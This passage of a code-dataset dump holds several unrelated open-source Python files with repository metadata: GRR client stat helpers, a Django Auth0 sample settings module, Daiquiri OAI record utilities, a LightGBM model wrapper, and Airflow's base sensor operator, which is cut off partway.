_STAT_ATTRS = [
"st_mode",
"st_ino",
"st_dev",
"st_nlink",
"st_uid",
"st_gid",
"st_size",
"st_atime",
"st_mtime",
"st_ctime",
"st_blocks",
"st_blksize",
"st_rdev",
]
| 29.078261
| 79
| 0.746112
|
import logging
import sys
from grr_response_core.lib import utils
from grr_response_core.lib.rdfvalues import client_fs as rdf_client_fs
from grr_response_core.lib.rdfvalues import paths as rdf_paths
if sys.platform == "win32":
from grr_response_client import client_utils_windows as _client_utils
elif sys.platform == "darwin":
from grr_response_client import client_utils_osx as _client_utils
else:
from grr_response_client import client_utils_linux as _client_utils
CanonicalPathToLocalPath = _client_utils.CanonicalPathToLocalPath
FindProxies = _client_utils.FindProxies
GetExtAttrs = _client_utils.GetExtAttrs
GetRawDevice = _client_utils.GetRawDevice
KeepAlive = _client_utils.KeepAlive
LocalPathToCanonicalPath = _client_utils.LocalPathToCanonicalPath
MemoryRegions = _client_utils.MemoryRegions
NannyController = _client_utils.NannyController
OpenProcessForMemoryAccess = _client_utils.OpenProcessForMemoryAccess
TransactionLog = _client_utils.TransactionLog
VerifyFileOwner = _client_utils.VerifyFileOwner
def StatEntryFromPath(path, pathspec, ext_attrs=True):
try:
stat = utils.Stat(path)
except (IOError, OSError) as error:
logging.error("Failed to obtain stat for '%s': %s", pathspec, error)
return rdf_client_fs.StatEntry(pathspec=pathspec)
return StatEntryFromStat(stat, pathspec, ext_attrs=ext_attrs)
def StatEntryFromStat(stat, pathspec, ext_attrs=True):
result = rdf_client_fs.StatEntry(pathspec=pathspec)
for attr in _STAT_ATTRS:
value = getattr(stat.GetRaw(), attr, None)
if value is None:
continue
value = int(value)
if value < 0:
value &= 0xFFFFFFFF
setattr(result, attr, value)
result.st_flags_linux = stat.GetLinuxFlags()
result.st_flags_osx = stat.GetOsxFlags()
if ext_attrs:
result.ext_attrs = list(GetExtAttrs(stat.GetPath()))
return result
def StatEntryFromStatPathSpec(stat, ext_attrs):
pathspec = rdf_paths.PathSpec(
pathtype=rdf_paths.PathSpec.PathType.OS,
path=LocalPathToCanonicalPath(stat.GetPath()),
path_options=rdf_paths.PathSpec.Options.CASE_LITERAL)
return StatEntryFromStat(stat, pathspec, ext_attrs=ext_attrs)
_STAT_ATTRS = [
"st_mode",
"st_ino",
"st_dev",
"st_nlink",
"st_uid",
"st_gid",
"st_size",
"st_atime",
"st_mtime",
"st_ctime",
"st_blocks",
"st_blksize",
"st_rdev",
]
| true
| true
|
790dae2213573bb04aeb653ea71d00b40d4cde44
| 4,045
|
py
|
Python
|
01-Login/webappexample/settings.py
|
alexisluque/auth0-django-web-app
|
4c6a530fac04e2b48f2dc85cc8ef414e2b03c599
|
[
"MIT"
] | null | null | null |
01-Login/webappexample/settings.py
|
alexisluque/auth0-django-web-app
|
4c6a530fac04e2b48f2dc85cc8ef414e2b03c599
|
[
"MIT"
] | 1
|
2018-07-09T14:23:54.000Z
|
2018-07-09T14:23:54.000Z
|
01-Login/webappexample/settings.py
|
alexisluque/auth0-django-web-app
|
4c6a530fac04e2b48f2dc85cc8ef414e2b03c599
|
[
"MIT"
] | null | null | null |
"""
Django settings for webappexample project.
Generated by 'django-admin startproject' using Django 1.11.4.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.11/ref/settings/
"""
from dotenv import load_dotenv, find_dotenv
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '*dn4z%$4b6-d1+epmb=hd1m3g#$*1*%&%x+4m_8*cvakee%=7q'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'social_django',
'auth0login'
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'webappexample.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'webappexample.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.11/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/
STATIC_URL = '/static/'
ENV_FILE = find_dotenv()
if ENV_FILE:
load_dotenv(ENV_FILE)
# SOCIAL AUTH AUTH0 BACKEND CONFIG
SOCIAL_AUTH_TRAILING_SLASH = False
SOCIAL_AUTH_AUTH0_KEY = os.environ.get('AUTH0_CLIENT_ID')
SOCIAL_AUTH_AUTH0_SECRET = os.environ.get('AUTH0_CLIENT_SECRET')
SOCIAL_AUTH_AUTH0_SCOPE = [
'openid',
'profile'
]
SOCIAL_AUTH_AUTH0_DOMAIN = os.environ.get('AUTH0_DOMAIN')
AUDIENCE = None
if os.environ.get('AUTH0_AUDIENCE'):
AUDIENCE = os.environ.get('AUTH0_AUDIENCE')
else:
if SOCIAL_AUTH_AUTH0_DOMAIN:
AUDIENCE = 'https://' + SOCIAL_AUTH_AUTH0_DOMAIN + '/userinfo'
if AUDIENCE:
SOCIAL_AUTH_AUTH0_AUTH_EXTRA_ARGUMENTS = {'audience': AUDIENCE}
AUTHENTICATION_BACKENDS = {
'auth0login.auth0backend.Auth0',
'django.contrib.auth.backends.ModelBackend'
}
LOGIN_URL = '/login/auth0'
LOGIN_REDIRECT_URL = '/dashboard'
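# Editor's note: an illustrative sketch of the audience fallback above,
# restated as a self-contained helper; not part of the original settings
# module, and the domain used in the assertion is hypothetical.
def _resolve_audience(explicit_audience, domain):
    """Return the explicit audience if set, else the domain's /userinfo URL."""
    if explicit_audience:
        return explicit_audience
    if domain:
        return 'https://' + domain + '/userinfo'
    return None

assert _resolve_audience(None, 'example.auth0.com') == 'https://example.auth0.com/userinfo'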
| 26.096774
| 91
| 0.710507
|
from dotenv import load_dotenv, find_dotenv
import os
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
SECRET_KEY = '*dn4z%$4b6-d1+epmb=hd1m3g#$*1*%&%x+4m_8*cvakee%=7q'
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'social_django',
'auth0login'
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'webappexample.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'webappexample.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.11/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/
STATIC_URL = '/static/'
ENV_FILE = find_dotenv()
if ENV_FILE:
load_dotenv(ENV_FILE)
# SOCIAL AUTH AUTH0 BACKEND CONFIG
SOCIAL_AUTH_TRAILING_SLASH = False
SOCIAL_AUTH_AUTH0_KEY = os.environ.get('AUTH0_CLIENT_ID')
SOCIAL_AUTH_AUTH0_SECRET = os.environ.get('AUTH0_CLIENT_SECRET')
SOCIAL_AUTH_AUTH0_SCOPE = [
'openid',
'profile'
]
SOCIAL_AUTH_AUTH0_DOMAIN = os.environ.get('AUTH0_DOMAIN')
AUDIENCE = None
if os.environ.get('AUTH0_AUDIENCE'):
AUDIENCE = os.environ.get('AUTH0_AUDIENCE')
else:
if SOCIAL_AUTH_AUTH0_DOMAIN:
AUDIENCE = 'https://' + SOCIAL_AUTH_AUTH0_DOMAIN + '/userinfo'
if AUDIENCE:
SOCIAL_AUTH_AUTH0_AUTH_EXTRA_ARGUMENTS = {'audience': AUDIENCE}
AUTHENTICATION_BACKENDS = {
'auth0login.auth0backend.Auth0',
'django.contrib.auth.backends.ModelBackend'
}
LOGIN_URL = '/login/auth0'
LOGIN_REDIRECT_URL = '/dashboard'
| true
| true
|
790daea48156492a628ca355400ac2fc6d76bdbc
| 2,288
|
py
|
Python
|
daiquiri/oai/utils.py
|
agy-why/daiquiri
|
4d3e2ce51e202d5a8f1df404a0094a4e018dcb4d
|
[
"Apache-2.0"
] | 14
|
2018-12-23T18:35:02.000Z
|
2021-12-15T04:55:12.000Z
|
daiquiri/oai/utils.py
|
agy-why/daiquiri
|
4d3e2ce51e202d5a8f1df404a0094a4e018dcb4d
|
[
"Apache-2.0"
] | 40
|
2018-12-20T12:44:05.000Z
|
2022-03-21T11:35:20.000Z
|
daiquiri/oai/utils.py
|
agy-why/daiquiri
|
4d3e2ce51e202d5a8f1df404a0094a4e018dcb4d
|
[
"Apache-2.0"
] | 5
|
2019-05-16T08:03:35.000Z
|
2021-08-23T20:03:11.000Z
|
import logging
from django.conf import settings
from daiquiri.core.utils import import_class
from .adapter import OaiAdapter
from .models import Record
logger = logging.getLogger(__name__)
def get_metadata_format(metadata_prefix):
return next(metadata_format for metadata_format in settings.OAI_METADATA_FORMATS
if metadata_format['prefix'] == metadata_prefix)
def get_renderer(metadata_prefix):
renderer_class = get_metadata_format(metadata_prefix)['renderer_class']
return import_class(renderer_class)()
def update_records(resource_type, resource):
logger.debug('update_records %s %s', resource_type, resource)
adapter = OaiAdapter()
try:
resource_id, identifier, datestamp, set_spec, public = adapter.get_record(resource_type, resource)
except TypeError:
raise RuntimeError('Could not obtain record for %s %s' % (resource_type, resource))
if public is True:
for metadata_prefix in adapter.resource_types[resource_type]:
try:
record = Record.objects.get(identifier=identifier, metadata_prefix=metadata_prefix)
except Record.DoesNotExist:
record = Record(identifier=identifier, metadata_prefix=metadata_prefix)
record.datestamp = datestamp
record.set_spec = set_spec
record.deleted = False
record.resource_type = resource_type
record.resource_id = resource_id
record.save()
else:
delete_records(resource_type, resource)
def delete_records(resource_type, resource):
logger.debug('delete_records %s %s', resource_type, resource)
adapter = OaiAdapter()
try:
resource_id, identifier, datestamp, set_spec, public = adapter.get_record(resource_type, resource)
except TypeError:
raise RuntimeError('Could not obtain record for %s %s' % (resource_type, resource))
for metadata_prefix in adapter.resource_types[resource_type]:
try:
record = Record.objects.get(identifier=identifier, metadata_prefix=metadata_prefix)
record.datestamp = datestamp
record.set_spec = set_spec
record.deleted = True
record.save()
except Record.DoesNotExist:
pass
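# Editor's note: a hedged, self-contained sketch of how get_metadata_format
# scans OAI_METADATA_FORMATS; not part of the original module, and the list
# below is a hypothetical stand-in for a real Daiquiri configuration.
if __name__ == "__main__":
    _formats = [{'prefix': 'oai_dc', 'renderer_class': 'myproject.renderers.DublinCoreRenderer'}]  # hypothetical
    _match = next(f for f in _formats if f['prefix'] == 'oai_dc')
    print(_match['renderer_class'])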
| 33.15942
| 106
| 0.697115
|
import logging
from django.conf import settings
from daiquiri.core.utils import import_class
from .adapter import OaiAdapter
from .models import Record
logger = logging.getLogger(__name__)
def get_metadata_format(metadata_prefix):
return next(metadata_format for metadata_format in settings.OAI_METADATA_FORMATS
if metadata_format['prefix'] == metadata_prefix)
def get_renderer(metadata_prefix):
renderer_class = get_metadata_format(metadata_prefix)['renderer_class']
return import_class(renderer_class)()
def update_records(resource_type, resource):
logger.debug('update_records %s %s', resource_type, resource)
adapter = OaiAdapter()
try:
resource_id, identifier, datestamp, set_spec, public = adapter.get_record(resource_type, resource)
except TypeError:
raise RuntimeError('Could not obtain record for %s %s' % (resource_type, resource))
if public is True:
for metadata_prefix in adapter.resource_types[resource_type]:
try:
record = Record.objects.get(identifier=identifier, metadata_prefix=metadata_prefix)
except Record.DoesNotExist:
record = Record(identifier=identifier, metadata_prefix=metadata_prefix)
record.datestamp = datestamp
record.set_spec = set_spec
record.deleted = False
record.resource_type = resource_type
record.resource_id = resource_id
record.save()
else:
delete_records(resource_type, resource)
def delete_records(resource_type, resource):
logger.debug('delete_records %s %s', resource_type, resource)
adapter = OaiAdapter()
try:
resource_id, identifier, datestamp, set_spec, public = adapter.get_record(resource_type, resource)
except TypeError:
raise RuntimeError('Could not obtain record for %s %s' % (resource_type, resource))
for metadata_prefix in adapter.resource_types[resource_type]:
try:
record = Record.objects.get(identifier=identifier, metadata_prefix=metadata_prefix)
record.datestamp = datestamp
record.set_spec = set_spec
record.deleted = True
record.save()
except Record.DoesNotExist:
pass
| true
| true
|
790dafb3cd44c4622f4bde96ce06a13b96b35e6e
| 2,003
|
py
|
Python
|
classifier/src/model_lgb.py
|
banboooo044/natural-language-sentiment-anaysis
|
e18d7c0373d9f0a00d5a3cc14abf671081bc940b
|
[
"DOC"
] | null | null | null |
classifier/src/model_lgb.py
|
banboooo044/natural-language-sentiment-anaysis
|
e18d7c0373d9f0a00d5a3cc14abf671081bc940b
|
[
"DOC"
] | null | null | null |
classifier/src/model_lgb.py
|
banboooo044/natural-language-sentiment-anaysis
|
e18d7c0373d9f0a00d5a3cc14abf671081bc940b
|
[
"DOC"
] | null | null | null |
import os
import sys
sys.path.append('../')
import numpy as np
import pandas as pd
import lightgbm as lgb
from src.model import Model
from src.util import Util
from sklearn.metrics import log_loss, accuracy_score, f1_score, classification_report
class ModelLGB(Model):
def __init__(self, run_fold_name, **params):
super().__init__(run_fold_name, params)
def train(self, tr_x, tr_y, va_x=None, va_y=None):
validation = va_x is not None
dtrain = lgb.Dataset(tr_x, label=tr_y)
if validation:
dvalid = lgb.Dataset(va_x, label=va_y)
params = dict(self.params)
num_round = params.pop('num_boost_round')
if validation:
            # Use early stopping when validation data is available
early_stopping_rounds = params.pop('early_stopping_rounds')
watchlist = [dtrain, dvalid ]
self.model = lgb.train(params, dtrain, num_round, valid_sets=watchlist,
valid_names=['train','eval'],
early_stopping_rounds=early_stopping_rounds)
else:
            watchlist = [dtrain]
            self.model = lgb.train(params, dtrain, num_round,
                                   valid_sets=watchlist, valid_names=['train'])
def predict(self, te_x):
        return self.model.predict(te_x, num_iteration=self.model.best_iteration)
def score(self, te_x, te_y):
pred_prob = self.predict(te_x)
y_pred = np.argmax(pred_prob, axis=1)
# print(classification_report(te_y, y_pred))
return f1_score(np.identity(5)[te_y], np.identity(5)[y_pred], average='samples')
def save_model(self, feature):
model_path = os.path.join(f'../model/model/{feature}', f'{self.run_fold_name}.model')
os.makedirs(os.path.dirname(model_path), exist_ok=True)
Util.dump(self.model, model_path)
def load_model(self, feature):
model_path = os.path.join(f'../model/model/{feature}', f'{self.run_fold_name}.model')
self.model = Util.load(model_path)
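# Editor's note: a minimal, hedged usage sketch, not part of the original
# file. The parameter names follow standard LightGBM conventions plus the
# two keys this class pops itself; 'bow' is a hypothetical feature label.
if __name__ == "__main__":
    params = {
        'objective': 'multiclass',
        'num_class': 5,
        'num_boost_round': 100,
        'early_stopping_rounds': 10,
    }
    model = ModelLGB('run0-fold0', **params)
    # With numpy/pandas feature matrices and integer labels:
    # model.train(tr_x, tr_y, va_x, va_y)
    # model.save_model('bow')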
| 36.418182
| 93
| 0.64653
|
import os
import sys
sys.path.append('../')
import numpy as np
import pandas as pd
import lightgbm as lgb
from src.model import Model
from src.util import Util
from sklearn.metrics import log_loss, accuracy_score, f1_score, classification_report
class ModelLGB(Model):
def __init__(self, run_fold_name, **params):
super().__init__(run_fold_name, params)
def train(self, tr_x, tr_y, va_x=None, va_y=None):
validation = va_x is not None
dtrain = lgb.Dataset(tr_x, label=tr_y)
if validation:
dvalid = lgb.Dataset(va_x, label=va_y)
params = dict(self.params)
num_round = params.pop('num_boost_round')
if validation:
early_stopping_rounds = params.pop('early_stopping_rounds')
watchlist = [dtrain, dvalid ]
self.model = lgb.train(params, dtrain, num_round, valid_sets=watchlist,
valid_names=['train','eval'],
early_stopping_rounds=early_stopping_rounds)
else:
            watchlist = [dtrain]
            self.model = lgb.train(params, dtrain, num_round,
                                   valid_sets=watchlist, valid_names=['train'])
def predict(self, te_x):
        return self.model.predict(te_x, num_iteration=self.model.best_iteration)
def score(self, te_x, te_y):
pred_prob = self.predict(te_x)
y_pred = np.argmax(pred_prob, axis=1)
return f1_score(np.identity(5)[te_y], np.identity(5)[y_pred], average='samples')
def save_model(self, feature):
model_path = os.path.join(f'../model/model/{feature}', f'{self.run_fold_name}.model')
os.makedirs(os.path.dirname(model_path), exist_ok=True)
Util.dump(self.model, model_path)
def load_model(self, feature):
model_path = os.path.join(f'../model/model/{feature}', f'{self.run_fold_name}.model')
self.model = Util.load(model_path)
| true
| true
|
790db0a494b66f67346f0144d8df455628407ad8
| 9,231
|
py
|
Python
|
airflow/sensors/base_sensor_operator.py
|
joshowen/airflow
|
d0cf232919839d0e338dcc38a5c7a1841077eaae
|
[
"Apache-2.0"
] | 3
|
2015-08-25T13:56:44.000Z
|
2020-03-21T10:26:58.000Z
|
airflow/sensors/base_sensor_operator.py
|
joshowen/airflow
|
d0cf232919839d0e338dcc38a5c7a1841077eaae
|
[
"Apache-2.0"
] | 37
|
2020-07-21T07:50:02.000Z
|
2022-03-29T22:31:28.000Z
|
airflow/sensors/base_sensor_operator.py
|
santecapital/airflow
|
7f02e56c9cb8b548624d13e9c2c2b89d753f996b
|
[
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"ECL-2.0",
"BSD-3-Clause"
] | 4
|
2020-07-17T14:02:28.000Z
|
2022-02-23T04:29:58.000Z
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import hashlib
import os
from datetime import timedelta
from time import sleep
from typing import Any, Dict, Iterable
from airflow.exceptions import (
AirflowException, AirflowRescheduleException, AirflowSensorTimeout, AirflowSkipException,
)
from airflow.models import BaseOperator, SkipMixin, TaskReschedule
from airflow.ti_deps.deps.ready_to_reschedule import ReadyToRescheduleDep
from airflow.utils import timezone
from airflow.utils.decorators import apply_defaults
class BaseSensorOperator(BaseOperator, SkipMixin):
"""
Sensor operators are derived from this class and inherit these attributes.
Sensor operators keep executing at a time interval and succeed when
    a criterion is met and fail if and when they time out.
:param soft_fail: Set to true to mark the task as SKIPPED on failure
:type soft_fail: bool
:param poke_interval: Time in seconds that the job should wait in
        between each try
:type poke_interval: float
:param timeout: Time, in seconds before the task times out and fails.
:type timeout: float
:param mode: How the sensor operates.
Options are: ``{ poke | reschedule }``, default is ``poke``.
When set to ``poke`` the sensor is taking up a worker slot for its
whole execution time and sleeps between pokes. Use this mode if the
expected runtime of the sensor is short or if a short poke interval
is required. Note that the sensor will hold onto a worker slot and
a pool slot for the duration of the sensor's runtime in this mode.
When set to ``reschedule`` the sensor task frees the worker slot when
    the criterion is not yet met and it's rescheduled at a later time. Use
this mode if the time before the criteria is met is expected to be
quite long. The poke interval should be more than one minute to
prevent too much load on the scheduler.
:type mode: str
:param exponential_backoff: allow progressive longer waits between
pokes by using exponential backoff algorithm
:type exponential_backoff: bool
"""
ui_color = '#e6f1f2' # type: str
valid_modes = ['poke', 'reschedule'] # type: Iterable[str]
@apply_defaults
def __init__(self,
poke_interval: float = 60,
timeout: float = 60 * 60 * 24 * 7,
soft_fail: bool = False,
mode: str = 'poke',
exponential_backoff: bool = False,
*args,
**kwargs) -> None:
super().__init__(*args, **kwargs)
self.poke_interval = poke_interval
self.soft_fail = soft_fail
self.timeout = timeout
self.mode = mode
self.exponential_backoff = exponential_backoff
self._validate_input_values()
def _validate_input_values(self) -> None:
if not isinstance(self.poke_interval, (int, float)) or self.poke_interval < 0:
raise AirflowException(
"The poke_interval must be a non-negative number")
if not isinstance(self.timeout, (int, float)) or self.timeout < 0:
raise AirflowException(
"The timeout must be a non-negative number")
if self.mode not in self.valid_modes:
raise AirflowException(
"The mode must be one of {valid_modes},"
"'{d}.{t}'; received '{m}'."
.format(valid_modes=self.valid_modes,
d=self.dag.dag_id if self.dag else "",
t=self.task_id, m=self.mode))
def poke(self, context: Dict) -> bool:
"""
Function that the sensors defined while deriving this class should
override.
"""
raise AirflowException('Override me.')
def execute(self, context: Dict) -> Any:
started_at = timezone.utcnow()
try_number = 1
log_dag_id = self.dag.dag_id if self.has_dag() else ""
if self.reschedule:
# If reschedule, use first start date of current try
task_reschedules = TaskReschedule.find_for_task_instance(context['ti'])
if task_reschedules:
started_at = task_reschedules[0].start_date
try_number = len(task_reschedules) + 1
while not self.poke(context):
if (timezone.utcnow() - started_at).total_seconds() > self.timeout:
# If sensor is in soft fail mode but will be retried then
# give it a chance and fail with timeout.
# This gives the ability to set up non-blocking AND soft-fail sensors.
if self.soft_fail and not context['ti'].is_eligible_to_retry():
self._do_skip_downstream_tasks(context)
raise AirflowSkipException(
f"Snap. Time is OUT. DAG id: {log_dag_id}")
else:
raise AirflowSensorTimeout(
f"Snap. Time is OUT. DAG id: {log_dag_id}")
if self.reschedule:
reschedule_date = timezone.utcnow() + timedelta(
seconds=self._get_next_poke_interval(started_at, try_number))
raise AirflowRescheduleException(reschedule_date)
else:
sleep(self._get_next_poke_interval(started_at, try_number))
try_number += 1
self.log.info("Success criteria met. Exiting.")
def _do_skip_downstream_tasks(self, context: Dict) -> None:
downstream_tasks = context['task'].get_flat_relatives(upstream=False)
self.log.debug("Downstream task_ids %s", downstream_tasks)
if downstream_tasks:
self.skip(context['dag_run'], context['ti'].execution_date, downstream_tasks)
def _get_next_poke_interval(self, started_at, try_number):
"""
        Uses the same logic as the exponential backoff retry delay for operators.
"""
if self.exponential_backoff:
min_backoff = int(self.poke_interval * (2 ** (try_number - 2)))
current_time = timezone.utcnow()
run_hash = int(hashlib.sha1("{}#{}#{}#{}".format(
self.dag_id, self.task_id, started_at, try_number
).encode("utf-8")).hexdigest(), 16)
modded_hash = min_backoff + run_hash % min_backoff
delay_backoff_in_seconds = min(
modded_hash,
timedelta.max.total_seconds() - 1
)
new_interval = min(self.timeout - int((current_time - started_at).total_seconds()),
delay_backoff_in_seconds)
self.log.info("new %s interval is %s", self.mode, new_interval)
return new_interval
else:
return self.poke_interval
@property
def reschedule(self):
"""Define mode rescheduled sensors."""
return self.mode == 'reschedule'
# pylint: disable=no-member
@property
def deps(self):
"""
Adds one additional dependency for all sensor operators that
checks if a sensor task instance can be rescheduled.
"""
if self.reschedule:
return BaseOperator.deps.fget(self) | {ReadyToRescheduleDep()}
return BaseOperator.deps.fget(self)
def poke_mode_only(cls):
"""
Class Decorator for child classes of BaseSensorOperator to indicate
    that instances of this class are only safe to use in poke mode.
Will decorate all methods in the class to assert they did not change
the mode from 'poke'.
:param cls: BaseSensor class to enforce methods only use 'poke' mode.
:type cls: type
"""
def decorate(cls_type):
def mode_getter(_):
return 'poke'
def mode_setter(_, value):
if value != 'poke':
raise ValueError(
f"cannot set mode to 'poke'.")
if not issubclass(cls_type, BaseSensorOperator):
raise ValueError(f"poke_mode_only decorator should only be "
f"applied to subclasses of BaseSensorOperator,"
f" got:{cls_type}.")
cls_type.mode = property(mode_getter, mode_setter)
return cls_type
return decorate(cls)
if 'BUILDING_AIRFLOW_DOCS' in os.environ:
# flake8: noqa: F811
# Monkey patch hook to get good function headers while building docs
apply_defaults = lambda x: x
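# Editor's note: a minimal, hedged example of subclassing BaseSensorOperator;
# it is not part of the original module and the class name is hypothetical.
class _ExampleFileSensor(BaseSensorOperator):
    """Succeeds once ``filepath`` exists on the local filesystem."""

    @apply_defaults
    def __init__(self, filepath: str, *args, **kwargs) -> None:
        super().__init__(*args, **kwargs)
        self.filepath = filepath

    def poke(self, context: Dict) -> bool:
        # Return True to finish; False to sleep for poke_interval and retry.
        return os.path.exists(self.filepath)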
| 41.769231
| 96
| 0.638609
|
import hashlib
import os
from datetime import timedelta
from time import sleep
from typing import Any, Dict, Iterable
from airflow.exceptions import (
AirflowException, AirflowRescheduleException, AirflowSensorTimeout, AirflowSkipException,
)
from airflow.models import BaseOperator, SkipMixin, TaskReschedule
from airflow.ti_deps.deps.ready_to_reschedule import ReadyToRescheduleDep
from airflow.utils import timezone
from airflow.utils.decorators import apply_defaults
class BaseSensorOperator(BaseOperator, SkipMixin):
ui_color = '#e6f1f2'
valid_modes = ['poke', 'reschedule']
@apply_defaults
def __init__(self,
poke_interval: float = 60,
timeout: float = 60 * 60 * 24 * 7,
soft_fail: bool = False,
mode: str = 'poke',
exponential_backoff: bool = False,
*args,
**kwargs) -> None:
super().__init__(*args, **kwargs)
self.poke_interval = poke_interval
self.soft_fail = soft_fail
self.timeout = timeout
self.mode = mode
self.exponential_backoff = exponential_backoff
self._validate_input_values()
def _validate_input_values(self) -> None:
if not isinstance(self.poke_interval, (int, float)) or self.poke_interval < 0:
raise AirflowException(
"The poke_interval must be a non-negative number")
if not isinstance(self.timeout, (int, float)) or self.timeout < 0:
raise AirflowException(
"The timeout must be a non-negative number")
if self.mode not in self.valid_modes:
raise AirflowException(
"The mode must be one of {valid_modes},"
"'{d}.{t}'; received '{m}'."
.format(valid_modes=self.valid_modes,
d=self.dag.dag_id if self.dag else "",
t=self.task_id, m=self.mode))
def poke(self, context: Dict) -> bool:
raise AirflowException('Override me.')
def execute(self, context: Dict) -> Any:
started_at = timezone.utcnow()
try_number = 1
log_dag_id = self.dag.dag_id if self.has_dag() else ""
if self.reschedule:
task_reschedules = TaskReschedule.find_for_task_instance(context['ti'])
if task_reschedules:
started_at = task_reschedules[0].start_date
try_number = len(task_reschedules) + 1
while not self.poke(context):
if (timezone.utcnow() - started_at).total_seconds() > self.timeout:
if self.soft_fail and not context['ti'].is_eligible_to_retry():
self._do_skip_downstream_tasks(context)
raise AirflowSkipException(
f"Snap. Time is OUT. DAG id: {log_dag_id}")
else:
raise AirflowSensorTimeout(
f"Snap. Time is OUT. DAG id: {log_dag_id}")
if self.reschedule:
reschedule_date = timezone.utcnow() + timedelta(
seconds=self._get_next_poke_interval(started_at, try_number))
raise AirflowRescheduleException(reschedule_date)
else:
sleep(self._get_next_poke_interval(started_at, try_number))
try_number += 1
self.log.info("Success criteria met. Exiting.")
def _do_skip_downstream_tasks(self, context: Dict) -> None:
downstream_tasks = context['task'].get_flat_relatives(upstream=False)
self.log.debug("Downstream task_ids %s", downstream_tasks)
if downstream_tasks:
self.skip(context['dag_run'], context['ti'].execution_date, downstream_tasks)
def _get_next_poke_interval(self, started_at, try_number):
if self.exponential_backoff:
min_backoff = int(self.poke_interval * (2 ** (try_number - 2)))
current_time = timezone.utcnow()
run_hash = int(hashlib.sha1("{}#{}#{}#{}".format(
self.dag_id, self.task_id, started_at, try_number
).encode("utf-8")).hexdigest(), 16)
modded_hash = min_backoff + run_hash % min_backoff
delay_backoff_in_seconds = min(
modded_hash,
timedelta.max.total_seconds() - 1
)
new_interval = min(self.timeout - int((current_time - started_at).total_seconds()),
delay_backoff_in_seconds)
